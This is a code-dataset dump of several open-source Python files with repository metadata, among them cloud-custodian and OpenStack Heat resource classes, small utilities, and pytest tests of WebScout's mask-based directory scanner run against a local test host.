text
stringlengths 4
1.02M
| meta
dict |
|---|---|
from __future__ import absolute_import, division, print_function, unicode_literals
from botocore.exceptions import ClientError
from c7n.manager import resources
from c7n.query import QueryResourceManager
from c7n.utils import local_session
from c7n.filters.vpc import SecurityGroupFilter, SubnetFilter
from c7n.tags import Tag, RemoveTag
@resources.register('directory')
class Directory(QueryResourceManager):
    """AWS Directory Service directories (Simple AD / AD Connector / MS AD)."""

    class resource_type(object):
        # describe_directories returns full records; no second detail call.
        service = "ds"
        enum_spec = ("describe_directories", "DirectoryDescriptions", None)
        name = "Name"
        id = "DirectoryId"
        dimension = None
        filter_name = 'DirectoryIds'
        filter_type = 'list'

    permissions = ('ds:ListTagsForResource',)

    def augment(self, directories):
        """Fetch and attach tags for each directory record."""
        def _fetch_tags(resource):
            client = local_session(self.session_factory).client('ds')
            response = client.list_tags_for_resource(
                ResourceId=resource['DirectoryId'])
            for tag in response.get('Tags', []):
                resource.setdefault('Tags', []).append(
                    {'Key': tag['Key'], 'Value': tag['Value']})
            return resource

        with self.executor_factory(max_workers=2) as pool:
            return list(filter(None, pool.map(_fetch_tags, directories)))
@Directory.filter_registry.register('subnet')
class DirectorySubnetFilter(SubnetFilter):
    """Filter directories by the subnets referenced in their VPC settings."""

    # JMESPath into the describe_directories record.
    RelatedIdsExpression = "VpcSettings.SubnetIds"
@Directory.filter_registry.register('security-group')
class DirectorySecurityGroupFilter(SecurityGroupFilter):
    """Filter directories by the security group in their VPC settings."""

    # DS exposes a single SecurityGroupId (singular) per directory.
    RelatedIdsExpression = "VpcSettings.SecurityGroupId"
@Directory.action_registry.register('tag')
class DirectoryTag(Tag):
    """Add tags to a directory

    :example:

    .. code-block: yaml

        policies:
          - name: tag-directory
            resource: directory
            filters:
              - "tag:desired-tag": absent
            actions:
              - type: tag
                key: desired-tag
                value: desired-value
    """
    # Fix: the IAM action backing add_tags_to_resource is
    # 'ds:AddTagsToResource' (plural); 'ds:AddTagToResource' does not exist,
    # so policies generated from the old value would request a bogus permission.
    permissions = ('ds:AddTagsToResource',)

    def process_resource_set(self, directories, tags):
        """Apply ``tags`` to every directory in ``directories``.

        Failures on individual resources are logged and skipped so one bad
        directory does not abort tagging of the rest of the set.
        """
        client = local_session(self.manager.session_factory).client('ds')
        tag_list = [{'Key': t['Key'], 'Value': t['Value']} for t in tags]
        for d in directories:
            try:
                client.add_tags_to_resource(
                    ResourceId=d['DirectoryId'], Tags=tag_list)
            except ClientError as e:
                self.log.exception(
                    'Exception tagging Directory %s: %s', d['DirectoryId'], e)
                continue
@Directory.action_registry.register('remove-tag')
class DirectoryRemoveTag(RemoveTag):
    """Remove tags from a directory

    :example:

    .. code-block: yaml

        policies:
          - name: remove-directory-tag
            resource: directory
            filters:
              - "tag:desired-tag": present
            actions:
              - type: remove-tag
                tags: ["desired-tag"]
    """
    permissions = ('ds:RemoveTagsFromResource',)

    def process_resource_set(self, directories, tags):
        """Strip the given tag keys from each directory, logging failures."""
        client = local_session(self.manager.session_factory).client('ds')
        for directory in directories:
            directory_id = directory['DirectoryId']
            try:
                client.remove_tags_from_resource(
                    ResourceId=directory_id, TagKeys=tags)
            except ClientError as err:
                # Best-effort: log and move on to the next resource.
                self.log.exception(
                    'Exception removing tags from Directory %s: %s',
                    directory_id, err)
@resources.register('cloud-directory')
class CloudDirectory(QueryResourceManager):
    """AWS Cloud Directory directories (clouddirectory service)."""

    class resource_type(object):
        service = "clouddirectory"
        enum_spec = ("list_directories", "Directories", None)
        # Cloud Directory resources are addressed by ARN, not a short id.
        id = "DirectoryArn"
        name = "Name"
        dimension = None
        # list_directories supports no server-side id filter.
        filter_name = None
|
{
"content_hash": "a5548c8344ab3a618569d9d95a2b9bf6",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 82,
"avg_line_length": 31.062992125984252,
"alnum_prop": 0.5855513307984791,
"repo_name": "JohnTheodore/cloud-custodian",
"id": "3d577884891d5a6e6dba0f22f831236ffa57976b",
"size": "4535",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "c7n/resources/directory.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "31"
},
{
"name": "Makefile",
"bytes": "6346"
},
{
"name": "Python",
"bytes": "2533086"
}
],
"symlink_target": ""
}
|
import matlab2cpp
def type_string(node):
    """
    Determine string representation of type.

    Outside scalars and armadillo, the datatype name and their declaration do not
    match. This function converts simple datatype declaration and translate them to
    equivalent C++ declarations.

    +-----------------+-----------------------+
    | Input           | Output                |
    +=================+=======================+
    | numerical types | node.type             |
    +-----------------+-----------------------+
    | struct, structs | struct container name |
    +-----------------+-----------------------+
    | func_lambda     | std::function<...>    |
    +-----------------+-----------------------+
    | string          | std::string           |
    +-----------------+-----------------------+

    Args:
        node (Node): location in tree
    Returns:
        str: String representation of node type
    """
    # lambda-function -> std::function<ret(params)>
    if node.type == "func_lambda":
        # link to actual lambda-function definition
        func = None
        if hasattr(node.declare, "reference"):
            func = node.declare.reference
        elif "_" + node.name in node.program[1].names:
            func = node.program[1]["_" + node.name]

        if func is not None:
            if len(func[1]) == 0:
                # no returns in lambda
                ret = "void"
                prm = ", ".join([p.type for p in func[2]])
            elif len(func[1]) == 1:
                # single return
                ret = func[1][0].type
                prm = ", ".join([p.type for p in func[2]])
            else:
                # multiple returns: emitted as extra output parameters
                ret = "void"
                prm = ", ".join([p.type for p in func[2][:] + func[1][:]])
            return "std::function<" + ret + "(" + prm + ")>"

        node.warning("lambda function content not found")
        return "std::function"

    # struct scalar and struct array share one generated container type
    elif node.type in ("struct", "structs"):
        declare = node.declare
        if declare.parent.cls == "Struct":
            declare = declare.parent
        return "_" + declare.name.capitalize()

    elif node.type == "string":
        return "std::string"

    # numerical types map straight through
    return node.type
# Run the module's doctests when executed directly.
if __name__ == "__main__":
    import doctest
    doctest.testmod()
|
{
"content_hash": "9d65af4f90d311babe6a7804d06d7d37",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 79,
"avg_line_length": 28.846153846153847,
"alnum_prop": 0.47244444444444444,
"repo_name": "jonathf/matlab2cpp",
"id": "1e6c5af5ced7fa76423f7aba1450b851d3cb045b",
"size": "2250",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/matlab2cpp/rules/function.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "3618"
},
{
"name": "Mathematica",
"bytes": "43"
},
{
"name": "Matlab",
"bytes": "1560"
},
{
"name": "Python",
"bytes": "558665"
}
],
"symlink_target": ""
}
|
"""Methods for manipulating a time series.
A Kegbot core may report a time series (Drink.tick_time_series) for the meter
events that caused a drink.
"""
def from_string(s):
    """Converts a time series to a list of (int, int) tuples.

    The string should be a sequence of zero or more <time>:<amount> pairs.
    Whitespace delimits each pair; leading and trailing whitespace is ignored.
    ValueError is raised on any malformed input.
    """
    result = []
    for token in s.strip().split():
        time_part, amount_part = token.split(":")
        event_time = int(time_part)
        amount = int(amount_part)
        if event_time < 0:
            raise ValueError("Time cannot be less than zero: %s" % event_time)
        result.append((event_time, amount))
    return result
def to_string(pairs):
    """Converts a series of (int, int) tuples to a time series string."""
    parts = ["%i:%i" % pair for pair in pairs]
    return " ".join(parts)
|
{
"content_hash": "3eef91ed89362021b188997fc3983cc5",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 78,
"avg_line_length": 30.2,
"alnum_prop": 0.6335540838852097,
"repo_name": "Kegbot/kegbot-server",
"id": "bcb1e22362d83b0fbeb12dd1a20797e60c493b79",
"size": "906",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pykeg/core/time_series.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "141465"
},
{
"name": "Dockerfile",
"bytes": "1836"
},
{
"name": "HTML",
"bytes": "122567"
},
{
"name": "JavaScript",
"bytes": "852819"
},
{
"name": "Less",
"bytes": "155169"
},
{
"name": "Makefile",
"bytes": "337"
},
{
"name": "Python",
"bytes": "671802"
},
{
"name": "Ruby",
"bytes": "161"
},
{
"name": "SCSS",
"bytes": "6040"
},
{
"name": "Shell",
"bytes": "581"
}
],
"symlink_target": ""
}
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the minimumNumber function below.
def minimumNumber(n, password):
    """Return the minimum number of characters to add to make *password* strong.

    A strong password has at least 6 characters and contains at least one
    digit, one lowercase letter, one uppercase letter, and one special
    (non-alphanumeric) character.  ``n`` is the password length as supplied
    by the harness; it is kept for interface compatibility but
    ``len(password)`` is used directly.
    """
    # One any() per required character class replaces the original
    # flag-tracking loop; "special" keeps the original definition of
    # neither digit nor alphabetic.
    has_digit = any(c.isdigit() for c in password)
    has_lower = any(c.islower() for c in password)
    has_upper = any(c.isupper() for c in password)
    has_special = any(not c.isdigit() and not c.isalpha() for c in password)
    missing = 4 - sum((has_digit, has_lower, has_upper, has_special))
    # Each added character can both lengthen the password and supply a
    # missing class, so the answer is the larger of the two deficits.
    # (When len >= 6 the length deficit is <= 0 and missing dominates,
    # matching the original two-branch return.)
    return max(6 - len(password), missing)
if __name__ == '__main__':
    # HackerRank harness: read length and password from stdin, write the
    # answer to the file named by the OUTPUT_PATH environment variable.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')

    n = int(input())

    password = input()

    answer = minimumNumber(n, password)

    fptr.write(str(answer) + '\n')

    fptr.close()
|
{
"content_hash": "c76fed907d580b789223e6b3e22b022d",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 79,
"avg_line_length": 26.527272727272727,
"alnum_prop": 0.564770390678547,
"repo_name": "MithileshCParab/HackerRank-10DaysOfStatistics",
"id": "81ca956cd95b921a28765b9a7e4e10e9778cfe90",
"size": "1459",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Problem Solving/Algorithms/Strings/strong_password.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "50206"
}
],
"symlink_target": ""
}
|
import pytest
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
@pytest.fixture
def driver(request):
    """Start a Chrome session for a test and quit it at teardown."""
    wd = webdriver.Chrome()
    # Log browser/driver capabilities to aid debugging failed runs.
    print(wd.capabilities)
    # Finalizer guarantees the browser closes even if the test fails.
    request.addfinalizer(wd.quit)
    return wd
def test_example(driver):
    """Search Google for 'webdriver' and wait for the results-page title."""
    driver.get("http://www.google.com/")
    # NOTE(review): find_element_by_* was removed in Selenium 4; this
    # assumes a Selenium 3.x environment — confirm the pinned version.
    driver.find_element_by_name("q").send_keys("webdriver")
    driver.find_element_by_name("btnG").click()
    # Expected title is localized ("Поиск в Google" — Russian-locale Google).
    WebDriverWait(driver, 10).until(EC.title_is("webdriver - Поиск в Google"))
|
{
"content_hash": "c56b3bd12e80397f546014ba8cf99c52",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 78,
"avg_line_length": 29.736842105263158,
"alnum_prop": 0.7398230088495575,
"repo_name": "IvankaK/Testing",
"id": "7947d7e87955580e6d48bd07c5feb64785c360ee",
"size": "571",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test_example.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "4876"
}
],
"symlink_target": ""
}
|
from heat.common import exception
from heat.common.i18n import _
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources.openstack.neutron import neutron
from heat.engine import support
class L7Rule(neutron.NeutronResource):
    """A resource for managing LBaaS v2 L7Rules.

    This resource manages Neutron-LBaaS v2 L7Rules, which represent
    a set of attributes that defines which part of the request should
    be matched and how it should be matched.
    """

    support_status = support.SupportStatus(version='7.0.0')

    # Only usable when the cloud exposes the Neutron 'lbaasv2' extension.
    required_service_extension = 'lbaasv2'

    # Client-plugin entity name and the key wrapping show() responses.
    entity = 'lbaas_l7rule'
    res_info_key = 'rule'

    PROPERTIES = (
        ADMIN_STATE_UP, L7POLICY, TYPE, COMPARE_TYPE,
        INVERT, KEY, VALUE
    ) = (
        'admin_state_up', 'l7policy', 'type', 'compare_type',
        'invert', 'key', 'value'
    )

    # What part of the request the rule inspects.
    L7RULE_TYPES = (
        HOST_NAME, PATH, FILE_TYPE, HEADER, COOKIE
    ) = (
        'HOST_NAME', 'PATH', 'FILE_TYPE', 'HEADER', 'COOKIE'
    )

    # How the inspected value is compared against VALUE.
    L7COMPARE_TYPES = (
        REGEX, STARTS_WITH, ENDS_WITH, CONTAINS, EQUAL_TO
    ) = (
        'REGEX', 'STARTS_WITH', 'ENDS_WITH', 'CONTAINS', 'EQUAL_TO'
    )

    properties_schema = {
        ADMIN_STATE_UP: properties.Schema(
            properties.Schema.BOOLEAN,
            _('The administrative state of the rule.'),
            default=True,
            update_allowed=True
        ),
        L7POLICY: properties.Schema(
            properties.Schema.STRING,
            _('ID or name of L7 policy this rule belongs to.'),
            required=True
        ),
        TYPE: properties.Schema(
            properties.Schema.STRING,
            _('Rule type.'),
            constraints=[constraints.AllowedValues(L7RULE_TYPES)],
            update_allowed=True,
            required=True
        ),
        COMPARE_TYPE: properties.Schema(
            properties.Schema.STRING,
            _('Rule compare type.'),
            constraints=[constraints.AllowedValues(L7COMPARE_TYPES)],
            update_allowed=True,
            required=True
        ),
        INVERT: properties.Schema(
            properties.Schema.BOOLEAN,
            _('Invert the compare type.'),
            default=False,
            update_allowed=True
        ),
        KEY: properties.Schema(
            properties.Schema.STRING,
            _('Key to compare. Relevant for HEADER and COOKIE types only.'),
            update_allowed=True
        ),
        VALUE: properties.Schema(
            properties.Schema.STRING,
            _('Value to compare.'),
            update_allowed=True,
            required=True
        )
    }

    def __init__(self, name, definition, stack):
        super(L7Rule, self).__init__(name, definition, stack)
        # Lazily-resolved ids, cached after first lookup.
        self._l7p_id = None
        self._lb_id = None

    @property
    def l7policy_id(self):
        """Resolve the L7POLICY name-or-id property to an id (cached)."""
        client_plugin = self.client_plugin()
        if self._l7p_id is None:
            self._l7p_id = client_plugin.find_resourceid_by_name_or_id(
                client_plugin.RES_TYPE_LB_L7POLICY,
                self.properties[self.L7POLICY])
        return self._l7p_id

    @property
    def lb_id(self):
        """Resolve the owning loadbalancer id via policy -> listener (cached)."""
        if self._lb_id is None:
            policy = self.client().show_lbaas_l7policy(
                self.l7policy_id)['l7policy']
            listener_id = policy['listener_id']
            listener = self.client().show_listener(listener_id)['listener']
            self._lb_id = listener['loadbalancers'][0]['id']
        return self._lb_id

    def _check_lb_status(self):
        # The LB serializes provisioning operations; callers poll this
        # until the LB is back to a steady state.
        return self.client_plugin().check_lb_status(self.lb_id)

    def validate(self):
        """Reject HEADER/COOKIE rules that omit the KEY property."""
        res = super(L7Rule, self).validate()
        if res:
            return res
        if (self.properties[self.TYPE] in (self.HEADER, self.COOKIE) and
                self.properties[self.KEY] is None):
            msg = (_('Property %(key)s is missing. '
                     'This property should be specified for '
                     'rules of %(header)s and %(cookie)s types.') %
                   {'key': self.KEY,
                    'header': self.HEADER,
                    'cookie': self.COOKIE})
            raise exception.StackValidationFailed(message=msg)

    def handle_create(self):
        # Defer the actual API call to check_create_complete so it can be
        # retried while the loadbalancer is still provisioning.
        rule_args = dict((k, v) for k, v in self.properties.items()
                         if k != self.L7POLICY)
        return rule_args

    def check_create_complete(self, rule_args):
        if self.resource_id is None:
            try:
                l7rule = self.client().create_lbaas_l7rule(
                    self.l7policy_id,
                    {'rule': rule_args})['rule']
                self.resource_id_set(l7rule['id'])
            except Exception as ex:
                # "invalid state" means the LB is busy; poll again later.
                if self.client_plugin().is_invalid(ex):
                    return False
                raise
        return self._check_lb_status()

    def _res_get_args(self):
        # show() needs both the rule id and its parent policy id.
        return [self.resource_id, self.l7policy_id]

    def handle_update(self, json_snippet, tmpl_diff, prop_diff):
        self._update_called = False
        # When TYPE switches to COOKIE/HEADER the API requires KEY; carry
        # the existing key over if the diff omits it.
        if (prop_diff.get(self.TYPE) in (self.COOKIE, self.HEADER) and
                prop_diff.get(self.KEY) is None):
            prop_diff[self.KEY] = tmpl_diff['Properties'].get(self.KEY)
        return prop_diff

    def check_update_complete(self, prop_diff):
        if not prop_diff:
            return True
        if not self._update_called:
            try:
                self.client().update_lbaas_l7rule(
                    self.resource_id,
                    self.l7policy_id,
                    {'rule': prop_diff})
                self._update_called = True
            except Exception as ex:
                if self.client_plugin().is_invalid(ex):
                    return False
                raise
        return self._check_lb_status()

    def handle_delete(self):
        self._delete_called = False

    def check_delete_complete(self, data):
        if self.resource_id is None:
            return True
        if not self._delete_called:
            try:
                self.client().delete_lbaas_l7rule(
                    self.resource_id,
                    self.l7policy_id)
                self._delete_called = True
            except Exception as ex:
                if self.client_plugin().is_invalid(ex):
                    return False
                elif self.client_plugin().is_not_found(ex):
                    # Already gone — treat as successfully deleted.
                    return True
                raise
        return self._check_lb_status()
def resource_mapping():
    """Map the Heat resource type name to its implementation class."""
    mapping = {'OS::Neutron::LBaaS::L7Rule': L7Rule}
    return mapping
|
{
"content_hash": "5c6f7cdee134677d29ec106bbe3ff984",
"timestamp": "",
"source": "github",
"line_count": 206,
"max_line_length": 76,
"avg_line_length": 32.092233009708735,
"alnum_prop": 0.5453032824081077,
"repo_name": "openstack/heat",
"id": "28d0052e3d84f05e1b30632c4495a349dc390ecb",
"size": "7186",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "heat/engine/resources/openstack/neutron/lbaas/l7rule.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "9145593"
},
{
"name": "Shell",
"bytes": "65832"
}
],
"symlink_target": ""
}
|
"""
This is part of WebScout software
Docs EN: http://hack4sec.pro/wiki/index.php/WebScout_en
Docs RU: http://hack4sec.pro/wiki/index.php/WebScout
License: MIT
Copyright (c) Anton Kuzmin <http://anton-kuzmin.ru> (ru) <http://anton-kuzmin.pro> (en)
Tests of DafsMask module
"""
import sys
import os
import time
import pytest
import requests
from libs.common import file_get_contents, t
# Resolve the repository root (two levels up from this file) and the tests
# directory, then extend sys.path so project classes import without install.
wrpath = os.path.realpath(os.path.dirname(os.path.realpath(__file__)) + '/../../')
testpath = os.path.realpath(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(wrpath)
sys.path.append(wrpath + '/classes')
sys.path.append(testpath + '/classes')
sys.path.append(wrpath + '/classes/models')
sys.path.append(wrpath + '/classes/jobs')
sys.path.append(wrpath + '/classes/threads')
sys.path.append(wrpath + '/classes/kernel')
from CommonTest import CommonTest
class Test_RunDafsMask(CommonTest):
    """Tests of DafsMask module"""
    # Per-test configuration, reset in setup().
    method = None
    check_method = None
    use_https = False
    selenium = False
    dict = None
    mask = None
    # Mask -> number of generated candidates ('?l' = 26 lowercase letters).
    masks = {'?l': 26}

    def setup(self):
        """Reset test state and the local target server's logs/toggles."""
        CommonTest.setup(self)
        self.method = None
        self.check_method = None
        self.use_https = False
        self.selenium = False
        self.dict = None
        self.mask = None
        requests.get("http://wrtest.com/?clean_log=1")
        requests.get("http://wrtest.com/?protect_disable=1")
        requests.get("http://wrtest.com/?found_disable=1")

    def _prepare_db(self):
        """Truncate all tables and seed one project/ip/host fixture row."""
        self.db.q("TRUNCATE TABLE `projects`")
        self.db.q("TRUNCATE TABLE `ips`")
        self.db.q("TRUNCATE TABLE `hosts`")
        self.db.q("TRUNCATE TABLE `hosts_info`")
        self.db.q("TRUNCATE TABLE `urls`")
        self.db.q("TRUNCATE TABLE `requests`")
        self.db.q("INSERT INTO projects (id, name, descr) VALUES(1, 'test', '')")
        self.db.q("INSERT INTO ips (id, project_id, ip, descr) VALUES(1, 1, '127.0.0.1', '')")
        self.db.q("INSERT INTO `hosts` (id, project_id, ip_id, name, descr) VALUES (1,1,1,'wrtest.com', 'hd1')")

    def _logger(self, content=True, good_items=None, bad_items=None, in_output=None):
        """
        Check logger work
        :param content: should the per-item response content be checked?
        :param good_items: items that must have been found
        :param bad_items: items that must not have been found
        :param in_output: phrases expected in the run log
        :return:
        """
        good_items = good_items or []
        bad_items = bad_items or []
        in_output = in_output or []
        logs_path = "{0}/logs/dafs/{1}/".format(wrpath, t("%Y-%m-%d"))
        # The most recent run directory (sorted by timestamp name).
        time_dir = sorted(os.listdir(logs_path))[-1]
        run_log_data = file_get_contents("{0}/{1}/run.log".format(logs_path, time_dir))
        assert "Loaded {0} words from source".format(self._how_many_variants()) in run_log_data
        for item in in_output:
            assert item in run_log_data
        for item in bad_items:
            assert os.path.exists("{0}/{1}/items/{2}.txt".format(logs_path, time_dir, item))
            # HEAD responses have no body, so content checks are skipped.
            if self.check_method != 'head':
                assert ('<h1>Not Found</h1>' if content else '') in \
                    file_get_contents("{0}/{1}/items/{2}.txt".format(logs_path, time_dir, item))
        for item in good_items:
            assert os.path.exists("{0}/{1}/items/{2}.txt".format(logs_path, time_dir, item))
            if self.check_method != 'head':
                assert '<h1>Not Found</h1>' not in \
                    file_get_contents("{0}/{1}/items/{2}.txt".format(logs_path, time_dir, item))

    def _how_many_variants(self):
        """How many variants for requests we have?"""
        return self.masks[self.mask]

    def _check_requests_log(self, selenium_results=False):
        """
        Check requests log from server
        :param selenium_results: we checking selenium results?
        :return:
        """
        resp = requests.get("http://wrtest.com/?get_log=1").text.strip()
        # Selenium make 5 other requests - redirect to roos and css/js from there
        if selenium_results:
            assert len(resp.split("\n")) == \
                (self._how_many_variants() if not self.selenium else self._how_many_variants() + 5)
        else:
            assert len(resp.split("\n")) == self._how_many_variants()
        for _str in resp.split("\n"):
            tmp_protocol, tmp_ua, tmp_method, tmp_url = _str.split("\t")
            assert tmp_method.lower() == self.check_method.lower()
            assert tmp_protocol.lower() == ('https' if self.use_https else 'http')
        # No dups
        # Fix: the original compared the list length with itself (always
        # true); comparing against the set length actually detects dups.
        assert len(resp.split("\n")) == len(set(resp.split("\n")))

    # (method, check_method, use_https, msymbol, not_found_re)
    test_scan_dirs_data = [
        ('get', 'get', False, '@', False),
        ('get', 'get', True, '@', False),
        ('post', 'post', False, '@', False),
        ('post', 'post', True, '@', False),
        ('head', 'head', False, '@', False),
        ('head', 'head', True, '@', False),
        (False, 'head', False, '@', False),
        (False, 'head', True, '@', False),
        ('get', 'get', False, '%', False),
        ('head', 'get', True, '@', '--not-found-re=aaa'),
    ]

    @pytest.mark.parametrize("method,check_method,use_https,msymbol,not_found_re", test_scan_dirs_data)
    def test_scan(self, method, check_method, use_https, msymbol, not_found_re):
        """End-to-end mask scan: found urls land in the db, logs and server log agree."""
        self._prepare_db()
        self.use_https = use_https
        self.check_method = check_method
        self.mask = '?l'
        run_params = [
            './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--mask=' + self.mask
        ]
        if method:
            run_params.append('--method=' + method)
        if not_found_re:
            run_params.append(not_found_re)
        if use_https:
            run_params.append('--protocol=https')
        if msymbol != '@':
            run_params.append('--msymbol=' + msymbol)
            run_params.append('--template=/' + msymbol + '/')
        else:
            run_params.append('--template=/@/')
        self._run('normal', run_params)
        assert self.db.fetch_one("SELECT COUNT(id) FROM urls") == 4
        test_urls = ['/a/', '/b/', '/c/']
        have_urls = self.db.fetch_col("SELECT url FROM urls")
        for test_url in test_urls:
            assert test_url in have_urls
        assert self.db.fetch_one("SELECT COUNT(id) FROM urls") == 4
        assert self.db.fetch_one("SELECT COUNT(id) FROM urls_base") == 4
        assert self.db.fetch_one("SELECT COUNT(id) FROM urls_base WHERE name='c' AND parent_id=1 AND host_id=1") == 1
        assert self.db.fetch_one("SELECT COUNT(id) FROM urls_base WHERE name='b' AND parent_id=1 AND host_id=1") == 1
        assert self.db.fetch_one("SELECT COUNT(id) FROM urls_base WHERE name='a' AND parent_id=1 AND host_id=1") == 1
        assert self.db.fetch_one("SELECT COUNT(id) FROM urls_base WHERE name='/' AND parent_id=0 AND host_id=1") == 1
        self._logger(good_items=['a', 'b', 'c'], bad_items=['d', 'e', 'f'], in_output=['/a/', '/b/', '/c/'])
        self._check_requests_log()

    def test_scan_maxsize_error_head(self):
        """Responses above the configured size limit abort the scan."""
        self._prepare_db()
        out = self._run('normal', [
            './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com',
            '--template=/@', '--mask=maxsize', '--method=head'
        ])
        assert bool(out.count('but limit in config'))
        assert self.db.fetch_one("SELECT COUNT(id) FROM urls") == 0

    def test_scan_with_delay(self):
        """--delay with one thread must slow the run down measurably."""
        # Fix: the original called _prepare_db() twice back to back;
        # one call is sufficient (truncation is idempotent).
        self._prepare_db()
        self.check_method = 'head'
        self.mask = '?l'
        stime = int(time.time())
        self._run('normal', [
            './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@/', '--mask=' + self.mask,
        ])
        first_time = int(time.time()) - stime
        time.sleep(1)
        stime = int(time.time())
        self._run('normal', [
            './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@/', '--mask=' + self.mask,
            '--threads=1', '--delay=2'
        ])
        second_time = int(time.time()) - stime
        assert second_time/first_time >= 3

    many_positives_data = [
        (False),
        (True)
    ]

    @pytest.mark.parametrize("selenium", many_positives_data)
    def test_scan_many_positives(self, selenium):
        """ Usual GET scan on dirs HEAD method with many positives process die """
        requests.get("http://wrtest.com/?found_enable=1")
        self._prepare_db()
        self.check_method = 'get'
        self.mask = '?l'
        run_params = [
            './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@/', '--mask=' + self.mask,
        ]
        if selenium:
            run_params.append('--selenium=1')
            run_params.append('--not-found-re=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
        run_params.append('--threads=1')
        out = self._run('many-positives', run_params)
        assert 'Many positive detections' in out
        assert self.db.fetch_one("SELECT COUNT(id) FROM urls") == 0

    # (use_protect, protect_param, use_https)
    selenium_scan_protect_data = [
        (True, '--ddos-detect-phrase=PROTECTION', False),
        (True, '--ddos-detect-phrase=PROTECTION', True),
        (False, '', False),
        (True, '--ddos-human-action=PROTECTION', False),
    ]

    @pytest.mark.parametrize("use_protect,protect_param,use_https", selenium_scan_protect_data)
    def test_selenium_scan_protection(self, use_protect, protect_param, use_https):
        """Selenium-driven scan still finds urls with anti-DDoS protection active."""
        self._prepare_db()
        self.check_method = 'get'
        self.selenium = True
        self.use_https = use_https
        self.mask = '?l'
        run_params = [
            './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com',
            '--template=/@/',
            '--mask=' + self.mask,
            '--selenium=1', '--threads=1', '--not-found-re=Not Found'
        ]
        if use_protect:
            requests.get("http://wrtest.com/?protect_enable=1")
            run_params.append(protect_param)
        if use_https:
            run_params.append('--protocol=https')
        self._run('normal', run_params)
        assert self.db.fetch_one("SELECT COUNT(id) FROM urls") == 4
        self._logger(good_items=['a', 'b', 'c'], bad_items=['d', 'e', 'f'], in_output=['/a/', '/b/', '/c/'])
        self._check_requests_log(selenium_results=True)

    # (argv, expected error phrase) pairs for argument-validation checks.
    error_cmds = [
        (
            [
                './main.py', 'test', 'DafsMask', 'scan', '--host=notfound.com', '--template=/@',
                '--mask=l', '--method=HEAD'
            ],
            'not found in this project'
        ),
        (
            [
                './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
                '--mask=l', '--protocol=test'
            ],
            'Protocol param must be '
        ),
        (
            [
                './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com',
                '--template=/@', '--mask=l', '--method=test'
            ],
            'Method param must be only '
        ),
        (
            [
                './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com',
                '--template=/@', '--mask=l', '--not-found-codes=301,a,302'
            ],
            'Not-found code must be digital, but'
        ),
        (
            [
                './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
                '--mask=l', '--parts=a', '--part=1'
            ],
            'Parts param must be digital, but'
        ),
        (
            [
                './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
                '--mask=l', '--part=a', '--parts=2'
            ],
            'Part param must be digital, but'
        ),
        (
            [
                './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
                '--mask=l', '--part=1'
            ],
            "If you use '--part' param, you must specify '--parts'"
        ),
        (
            [
                './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
                '--mask=l', '--parts=1'
            ],
            "If you use '--parts' param, you must specify '--part'"
        ),
        (
            [
                './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
                '--mask=l', '--parts=1', '--part=2'
            ],
            'Number of part'
        ),
        (
            [
                './main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
                '--mask=l', '--delay=a'
            ],
            'Delay param must be digital, but'
        ),
    ]

    @pytest.mark.parametrize("cmd_set,check_phrase", error_cmds)
    def test_error(self, cmd_set, check_phrase):
        """Invalid argument combinations must emit the expected error phrase."""
        self._prepare_db()
        out = self._run('normal', cmd_set)
        assert out.count(check_phrase)
|
{
"content_hash": "2e930dd156679a54dde081800e8209cc",
"timestamp": "",
"source": "github",
"line_count": 342,
"max_line_length": 117,
"avg_line_length": 38.07017543859649,
"alnum_prop": 0.5236559139784946,
"repo_name": "hack4sec/ws-cli",
"id": "95881f15caeb54a1917a1a38724c01ba444ed325",
"size": "13044",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/run/test_RunDafsMask.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "680434"
}
],
"symlink_target": ""
}
|
import os,re
from waflib import Utils,Task,Errors,Logs,Node
from waflib.TaskGen import feature,before_method
re_bibunit=re.compile(r'\\(?P<type>putbib)\[(?P<file>[^\[\]]*)\]',re.M)
def bibunitscan(self):
